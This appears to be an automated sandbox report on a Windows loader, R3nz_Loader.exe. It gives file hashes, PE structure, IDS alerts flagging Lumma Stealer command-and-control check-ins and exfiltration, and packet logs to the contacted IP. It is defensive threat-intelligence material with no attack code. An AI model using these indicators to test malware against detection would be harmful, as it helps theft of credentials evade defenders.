                                                                            Entropy (8bit):7.128674977243316
                                                                            Encrypted:false
                                                                            SSDEEP:6144:+EQUaPo0tMBs/8d7+OUbY79SXh61wICBqrH9TmXCf5OthEVriynomZG:qPoY/srM+4o1w+LcXlExi4lZG
                                                                            MD5:747539CEFB1EF3C38AD756A2F5305097
                                                                            SHA1:6F5CE5B9D430931164E4B3E57DF4C98EA0F82C34
                                                                            SHA-256:05512CA3A16E8D0FB965DE8F20E9A9F0B046F3D3384D89D767C4D875182BDA3F
                                                                            SHA-512:4A9934BD7A2F8BFEC4DDFA0A7E9D24DBDFCEE864163804D9B3B726AB16209F1DE43A3CBD3E003531758C5C2A68AC21549C3A4DF7B6EE1E373D9A0DD8C1F209C6
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            Reputation:low
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]6...W...W...W...<...W...<..W...<...W...<...W..>....W...W..{W..K"...W..K"...W..K"...W...W...W..."...W..."...W..Rich.W..........PE..L.....qg...........!......................................................................@.............................|.......P...................................\...............................x...@...............T............................text.............................. ..`.rdata...\.......^..................@..@.data..............................@....reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................

                                                                            C:\Windows\appcompat\Programs\Amcache.hve

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:MS Windows registry file, NT/2000 or above
                                                                            Category:dropped
                                                                            Size (bytes):1835008
                                                                            Entropy (8bit):4.421673815632608
                                                                            Encrypted:false
                                                                            SSDEEP:6144:lSvfpi6ceLP/9skLmb0OToWSPHaJG8nAgeMZMMhA2fX4WABlEnNi0uhiTw:svloToW+EZMM6DFy003w
                                                                            MD5:7D7FBE8A69395F920AEBE7ECB0E7677B
                                                                            SHA1:30B5A3BA9C05015EE4D4CFA78EA2EB442D898F40
                                                                            SHA-256:5BD44443F8ED2E008509ACE20BCA32BCEB158A164B43D855D358B3E289C5EC17
                                                                            SHA-512:B3B91C3BB0FDEAC91C88FD3E39F4C253FD8C317A91237841076C4733DE3C1CAD75C6C05ADE914E545AD617A7BB2EFA9A49219AF961B7B4268246FCF195F724D1
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmz..)BZ...............................................................................................................................................................................................................................................................................................................................................1..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                            \Device\ConDrv

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\R3nz_Loader.exe
                                                                            File Type:ASCII text, with very long lines (354), with CRLF, LF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1415
                                                                            Entropy (8bit):4.541407831894227
                                                                            Encrypted:false
                                                                            SSDEEP:24:7v74Nu5MvXIUn2p/kpgw4r22Drrb2nknlusDp:7T4cMff2p8p14nrPKktp
                                                                            MD5:1F8E54DB13948BF2759E2DE1AEF4FF27
                                                                            SHA1:147E07C6B98CFF68D51C34CF30E338A8A17C156B
                                                                            SHA-256:3D638F789F4CC5B75D505F12DFF02DEA7FB8B7CF3D91DE35B56BA98C1CA038AF
                                                                            SHA-512:CC73D243D70EE2E26E1858E074B26DDF2F02CB06970D6B78E7E9EC9C449334FBA86FC7337073D80025EE15E34F7EC22026957B9E1D6A05DC6795D2CECD0F6442
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:.Unhandled Exception: System.Resources.MissingManifestResourceException: Could not find any resources appropriate for the specified culture or the neutral culture. Make sure "caspol.resources" was correctly embedded or linked into assembly "XeniaHarveyKaitlyn" at compile time, or that all the satellite assemblies required are loadable and fully signed... at System.Resources.ManifestBasedResourceGroveler.HandleResourceStreamMissing(String fileName).. at System.Resources.ManifestBasedResourceGroveler.GrovelForResourceSet(CultureInfo culture, Dictionary`2 localResourceSets, Boolean tryParents, Boolean createIfNotExists, StackCrawlMark& stackMark).. at System.Resources.ResourceManager.InternalGetResourceSet(CultureInfo requestedCulture, Boolean createIfNotExists, Boolean tryParents, StackCrawlMark& stackMark).. at System.Resources.ResourceManager.InternalGetResourceSet(CultureInfo culture, Boolean createIfNotExists, Boolean tryParents).. at System.Resources.ResourceManager.GetSt

                                                                            Static File Info

                                                                            General

                                                                            File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Entropy (8bit):7.737994793682443
                                                                            TrID:
                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                            • Win32 Executable (generic) a (10002005/4) 49.96%
                                                                            • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                            File name:R3nz_Loader.exe
                                                                            File size:706'048 bytes
                                                                            MD5:b43d8eca7777b170ddc40a824ab10bb6
                                                                            SHA1:a7da0bbde621a7df3489b394ee4e5cea963225e6
                                                                            SHA256:1db1a4c253278293c863dff9759c6577f1b6b5b8f69ac0c612338453eeea96d9
                                                                            SHA512:54c6ec0681b7e67782c4d142450f84bef5129c4cfa4dfbd70edc63bd3385d8cc9277cdfbcf2c3a8f6c5cb49b9252eb8c46984a65164164886b805e084e6bbb55
                                                                            SSDEEP:12288:ENvwXTkEVI9HBoDWupxGsFITxLmIJpCbp4/MLq/xgtQS7iBDgCL+ZNNzloh3LouP:ENoXQEV2hozxG0c0bp2Y4oQSW
                                                                            TLSH:EFE47B9C726072DFC867D472DEA82C68FA9174BB871F4217A02716AD9E0D897CF150F2
                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....qg..............0..............@....... ....@.. .......................`............@................................

                                                                            File Icon

                                                                            Icon Hash:00928e8e8686b000

                                                                            Static PE Info

                                                                            General

                                                                            Entrypoint:0x4b400a
                                                                            Entrypoint Section:
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows cui
                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                            Time Stamp:0x6771CD0F [Sun Dec 29 22:28:31 2024 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:4
                                                                            OS Version Minor:0
                                                                            File Version Major:4
                                                                            File Version Minor:0
                                                                            Subsystem Version Major:4
                                                                            Subsystem Version Minor:0
                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                            Entrypoint Preview

                                                                            Instruction
                                                                            jmp dword ptr [004B4000h]
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al

                                                                            Data Directories

                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x8e7800x4b.text
                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xb00000x640.rsrc
                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xb20000xc.reloc
                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IAT0xb40000x8
                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x8e0000x48.text
                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                            Sections

                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                            ^]tBD;I0x20000x8a8cc0x8aa004aba24cfb364dff8e98778b6d82a69fdFalse1.0003187697249774data7.999688407134414IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .text0x8e0000x20b480x20c00f53637936f05b21a5b09ae51f5f57bacFalse0.3313976025763359data4.688971111396578IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                            .rsrc0xb00000x6400x800d018ee0af29c98b01b7fd3895a878684False0.36279296875data3.5529147255674487IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .reloc0xb20000xc0x20049ba7a9e1e9d0fde8dd025f5fdb99dfeFalse0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                            0xb40000x100x20045934a465f9653459a1ea07b453b8625False0.044921875data0.14263576814887827IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

                                                                            Resources

                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                            RT_VERSION0xb00a00x3b4data0.45675105485232065
                                                                            RT_MANIFEST0xb04540x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                            Imports

                                                                            DLLImport
                                                                            mscoree.dll_CorExeMain

                                                                            Network Behavior

                                                                            Suricata IDS Alerts

                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                            2024-12-29T23:36:55.447181+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549704104.21.32.1443TCP
                                                                            2024-12-29T23:36:55.916300+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549704104.21.32.1443TCP
                                                                            2024-12-29T23:36:55.916300+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549704104.21.32.1443TCP
                                                                            2024-12-29T23:36:56.516425+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549705104.21.32.1443TCP
                                                                            2024-12-29T23:36:56.980247+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.549705104.21.32.1443TCP
                                                                            2024-12-29T23:36:56.980247+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549705104.21.32.1443TCP
                                                                            2024-12-29T23:36:57.936435+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549707104.21.32.1443TCP
                                                                            2024-12-29T23:36:59.137265+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549709104.21.32.1443TCP
                                                                            2024-12-29T23:36:59.618823+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.549709104.21.32.1443TCP
                                                                            2024-12-29T23:37:00.850104+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549714104.21.32.1443TCP
                                                                            2024-12-29T23:37:02.386572+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549715104.21.32.1443TCP
                                                                            2024-12-29T23:37:04.357809+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549716104.21.32.1443TCP
                                                                            2024-12-29T23:37:06.910342+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549717104.21.32.1443TCP
                                                                            2024-12-29T23:37:07.362321+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549717104.21.32.1443TCP

                                                                            Network Port Distribution

                                                                            TCP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Dec 29, 2024 23:36:54.999418974 CET49704443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:36:54.999465942 CET44349704104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:36:54.999543905 CET49704443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:36:55.000592947 CET49704443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:36:55.000606060 CET44349704104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:36:55.447102070 CET44349704104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:36:55.447180986 CET49704443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:36:55.450963974 CET49704443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:36:55.450973988 CET44349704104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:36:55.451217890 CET44349704104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:36:55.503643036 CET49704443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:36:55.517797947 CET49704443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:36:55.517813921 CET49704443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:36:55.517884970 CET44349704104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:36:55.916250944 CET44349704104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:36:55.916343927 CET44349704104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:36:55.916409969 CET49704443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:36:55.983843088 CET49704443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:36:55.983897924 CET44349704104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:36:55.983916044 CET49704443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:36:55.983922958 CET44349704104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:36:56.078555107 CET49705443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:36:56.078612089 CET44349705104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:36:56.078800917 CET49705443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:36:56.079494953 CET49705443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:36:56.079514980 CET44349705104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:36:56.516278028 CET44349705104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:36:56.516424894 CET49705443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:36:56.531290054 CET49705443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:36:56.531310081 CET44349705104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:36:56.531528950 CET44349705104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:36:56.538446903 CET49705443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:36:56.538561106 CET49705443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:36:56.538580894 CET44349705104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:36:56.980240107 CET44349705104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:36:56.980283022 CET44349705104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:36:56.980309963 CET44349705104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:36:56.980329990 CET49705443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:36:56.980339050 CET44349705104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:36:56.980349064 CET44349705104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:36:56.980391026 CET49705443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:36:56.980400085 CET44349705104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:36:56.980424881 CET44349705104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:36:56.980437994 CET49705443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:36:56.980443001 CET44349705104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:36:56.980477095 CET44349705104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:36:56.980487108 CET49705443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:36:56.980490923 CET44349705104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:36:56.980550051 CET49705443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:36:56.980714083 CET44349705104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:36:57.036166906 CET49705443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:36:57.036180973 CET44349705104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:36:57.063210964 CET44349705104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:36:57.063239098 CET44349705104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:36:57.063256979 CET49705443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:36:57.063261986 CET44349705104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:36:57.063271046 CET44349705104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:36:57.063339949 CET44349705104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:36:57.063342094 CET49705443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:36:57.063384056 CET49705443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:36:57.111373901 CET49705443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:36:57.111397028 CET44349705104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:36:57.111407042 CET49705443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:36:57.111413002 CET44349705104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:36:57.500977039 CET49707443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:36:57.501008034 CET44349707104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:36:57.501081944 CET49707443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:36:57.501516104 CET49707443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:36:57.501527071 CET44349707104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:36:57.936269045 CET44349707104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:36:57.936434984 CET49707443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:36:57.937896013 CET49707443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:36:57.937902927 CET44349707104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:36:57.938141108 CET44349707104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:36:57.939714909 CET49707443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:36:57.939714909 CET49707443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:36:57.939752102 CET44349707104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:36:58.540867090 CET44349707104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:36:58.540949106 CET44349707104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:36:58.541117907 CET49707443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:36:58.541474104 CET49707443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:36:58.541488886 CET44349707104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:36:58.677575111 CET49709443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:36:58.677637100 CET44349709104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:36:58.677927971 CET49709443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:36:58.678314924 CET49709443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:36:58.678333998 CET44349709104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:36:59.137181044 CET44349709104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:36:59.137264967 CET49709443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:36:59.138648033 CET49709443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:36:59.138659000 CET44349709104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:36:59.138880014 CET44349709104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:36:59.151302099 CET49709443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:36:59.155493975 CET49709443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:36:59.155536890 CET44349709104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:36:59.155590057 CET49709443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:36:59.203349113 CET44349709104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:36:59.618834972 CET44349709104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:36:59.618921995 CET44349709104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:36:59.619013071 CET49709443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:36:59.629853010 CET49709443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:36:59.629877090 CET44349709104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:00.406337976 CET49714443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:00.406363964 CET44349714104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:00.406461000 CET49714443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:00.406888008 CET49714443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:00.406897068 CET44349714104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:00.850033045 CET44349714104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:00.850104094 CET49714443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:00.851615906 CET49714443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:00.851624012 CET44349714104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:00.851855993 CET44349714104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:00.853910923 CET49714443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:00.854064941 CET49714443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:00.854093075 CET44349714104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:00.854161978 CET49714443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:00.854168892 CET44349714104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:01.482786894 CET44349714104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:01.482889891 CET44349714104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:01.483012915 CET49714443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:01.483130932 CET49714443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:01.483145952 CET44349714104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:01.951387882 CET49715443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:01.951427937 CET44349715104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:01.951500893 CET49715443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:01.951843977 CET49715443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:01.951860905 CET44349715104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:02.386473894 CET44349715104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:02.386571884 CET49715443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:02.388111115 CET49715443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:02.388122082 CET44349715104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:02.388326883 CET44349715104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:02.399676085 CET49715443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:02.399799109 CET49715443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:02.399806976 CET44349715104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:03.086950064 CET44349715104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:03.087037086 CET44349715104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:03.087120056 CET49715443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:03.089245081 CET49715443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:03.089262962 CET44349715104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:03.901685953 CET49716443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:03.901731014 CET44349716104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:03.901957035 CET49716443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:03.902357101 CET49716443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:03.902374029 CET44349716104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:04.357731104 CET44349716104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:04.357809067 CET49716443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:04.359880924 CET49716443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:04.359893084 CET44349716104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:04.360223055 CET44349716104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:04.388480902 CET49716443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:04.389606953 CET49716443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:04.389648914 CET44349716104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:04.389833927 CET49716443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:04.389870882 CET44349716104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:04.390022993 CET49716443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:04.390052080 CET44349716104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:04.390197992 CET49716443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:04.390229940 CET44349716104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:04.390388012 CET49716443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:04.390419960 CET44349716104.21.32.1192.168.2.5
